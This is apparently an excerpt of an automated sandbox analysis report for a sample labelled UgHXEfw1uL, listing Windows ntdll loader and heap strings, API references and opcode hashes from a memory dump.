                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 00F92178
                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 00F92180
                                          • SXS: %s() passed the empty activation context, xrefs: 00F92165
                                          • RtlGetAssemblyStorageRoot, xrefs: 00F92160, 00F9219A, 00F921BA
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                          • API String ID: 0-861424205
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00F62DF0: LdrInitializeThunk.NTDLL ref: 00F62DFA
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F60BA3
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F60BB6
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F60D60
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F60D74
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                          • String ID:
                                          • API String ID: 1404860816-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                          • API String ID: 0-379654539
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • minkernel\ntdll\ldrinit.c, xrefs: 00F58421
                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 00F5855E
                                          • @, xrefs: 00F58591
                                          • LdrpInitializeProcess, xrefs: 00F58422
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-1918872054
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • .Local, xrefs: 00F528D8
                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 00F922B6
                                          • SXS: %s() passed the empty activation context, xrefs: 00F921DE
                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 00F921D9, 00F922B1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                          • API String ID: 0-1239276146
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 00F93437
                                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 00F9342A
                                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 00F93456
                                          • RtlDeactivateActivationContext, xrefs: 00F93425, 00F93432, 00F93451
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                          • API String ID: 0-1245972979
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 00F8106B
                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 00F80FE5
                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 00F810AE
                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 00F81028
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                          • API String ID: 0-1468400865
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • LdrpDynamicShimModule, xrefs: 00F8A998
                                          • minkernel\ntdll\ldrinit.c, xrefs: 00F8A9A2
                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 00F8A992
                                          • TG, xrefs: 00F42462
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$TG$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-2078120800
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 00F3327D
                                          • HEAP[%wZ]: , xrefs: 00F33255
                                          • HEAP: , xrefs: 00F33264
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                          • API String ID: 0-617086771
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-4253913091
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: $@
                                          • API String ID: 2994545307-1077428164
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: FilterFullPath$UseFilter$\??\
                                          • API String ID: 0-2779062949
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • LdrpCheckModule, xrefs: 00F8A117
                                          • minkernel\ntdll\ldrinit.c, xrefs: 00F8A121
                                          • Failed to allocated memory for shimmed module list, xrefs: 00F8A10F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-161242083
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-1334570610
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 8T$LdrpResGetMappingSize Enter$LdrpResGetMappingSize Exit
                                          • API String ID: 0-2621877482
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00F1CD34
                                          • InstallLanguageFallback, xrefs: 00F1CD7F
                                          • @, xrefs: 00F1CD63
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                          • API String ID: 0-1757540487
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • minkernel\ntdll\ldrinit.c, xrefs: 00F982E8
                                          • Failed to reallocate the system dirs string !, xrefs: 00F982D7
                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 00F982DE
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-1783798831
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • PreferredUILanguages, xrefs: 00FDC212
                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 00FDC1C5
                                          • @, xrefs: 00FDC1F1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                          • API String ID: 0-2968386058
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                          • API String ID: 0-1373925480
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • LdrpCheckRedirection, xrefs: 00FA488F
                                          • minkernel\ntdll\ldrredirect.c, xrefs: 00FA4899
                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 00FA4888
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                          • API String ID: 0-3154609507
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PS$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                          • API String ID: 0-405261330
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-2558761708
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • minkernel\ntdll\ldrinit.c, xrefs: 00FA2104
                                          • Process initialization failed with status 0x%08lx, xrefs: 00FA20F3
                                          • LdrpInitializationFailure, xrefs: 00FA20FA
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-2986994758
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: #%u
                                          • API String ID: 48624451-232158463
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: MUI$\U
                                          • API String ID: 0-3971960151
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • LdrResSearchResource Enter, xrefs: 00F2AA13
                                          • LdrResSearchResource Exit, xrefs: 00F2AA25
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                          • API String ID: 0-4066393604
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: `$`
                                          • API String ID: 0-197956300
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Legacy$UEFI
                                          • API String ID: 2994545307-634100481
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$MUI
                                          • API String ID: 0-17815947
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • kLsE, xrefs: 00F20540
                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 00F2063D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                          • API String ID: 0-2547482624
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Cleanup Group$Threadpool!
                                          • API String ID: 2994545307-4008356553
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3916222277
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: GlobalTags
                                          • API String ID: 0-1106856819
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .mui
                                          • API String ID: 0-1199573805
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: EXT-
                                          • API String ID: 0-1948896318
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryHash
                                          • API String ID: 0-2202222882
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: TrustedInstaller
                                          • API String ID: 0-565535830
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: #
                                          • API String ID: 0-1885708031
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryName
                                          • API String ID: 0-215506332
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: WindowsExcludedProcs
                                          • API String ID: 0-3583428290
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 00FA895E
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                          • API String ID: 0-702105204
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e7e8924f69322beabe2845bb7665250a82a403f563212d0c3df7798fb136f83d
                                          • Instruction ID: bf3ef408b5cb2ad72f15f07586e92b895222a7d47b2bde15482459747b11e745
                                          • Opcode Fuzzy Hash: e7e8924f69322beabe2845bb7665250a82a403f563212d0c3df7798fb136f83d
                                          • Instruction Fuzzy Hash: 5442D432A083428BD765CF68C992F6BB7E5EF88710F18092EF98197290D774DC45EB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0ee902c0c0ed8ca5b7a536a46805a76151b2b8a5104e633bb94bac3f3b4a5de2
                                          • Instruction ID: a7fb2276252714f730bfaeeac5de7a37ff2ae4dba35f8db517244a0527eeed13
                                          • Opcode Fuzzy Hash: 0ee902c0c0ed8ca5b7a536a46805a76151b2b8a5104e633bb94bac3f3b4a5de2
                                          • Instruction Fuzzy Hash: D8423C75E002198FDB24CF69C881BEDB7F9BF88750F188199E849AB241DB349D86DF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dcda80f1c65c08e7d8314ec67cb213b5905094096402bb5d3d0eca174b5ae624
                                          • Instruction ID: d3135c6f35651d53f07580cea01e603eecb2c16781edeb3853c3ae1067fcbff4
                                          • Opcode Fuzzy Hash: dcda80f1c65c08e7d8314ec67cb213b5905094096402bb5d3d0eca174b5ae624
                                          • Instruction Fuzzy Hash: 5432CF70A007558FDB24EF69C8457BEBBF2BF84314F24411DE48ADB285DB39A842EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a500fead3dbae41c28a66e93b41cdb6cf8384d3782a8adb481536ade2182f3b2
                                          • Instruction ID: dd0121fd393d071cd85001eb57f75175cc8db42920a9dab80642e2b9896fd48e
                                          • Opcode Fuzzy Hash: a500fead3dbae41c28a66e93b41cdb6cf8384d3782a8adb481536ade2182f3b2
                                          • Instruction Fuzzy Hash: F722F471A0465A8BD724CF29C252B72B7F1BF44318F18849DD8968F285D335F852FB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 511cb88c68fd71d12a6e4f3747d57b6296cee12241aa6db19df8e75f27514aac
                                          • Instruction ID: 7fe589d92fb26f38e77f0fa8af9871a78aeef7544132ff31cfd809e22c56dfb3
                                          • Opcode Fuzzy Hash: 511cb88c68fd71d12a6e4f3747d57b6296cee12241aa6db19df8e75f27514aac
                                          • Instruction Fuzzy Hash: 95327B71A05618CFCB24DFA8D880BAAB7F5FF48310F248669E955EB391D734AC41EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
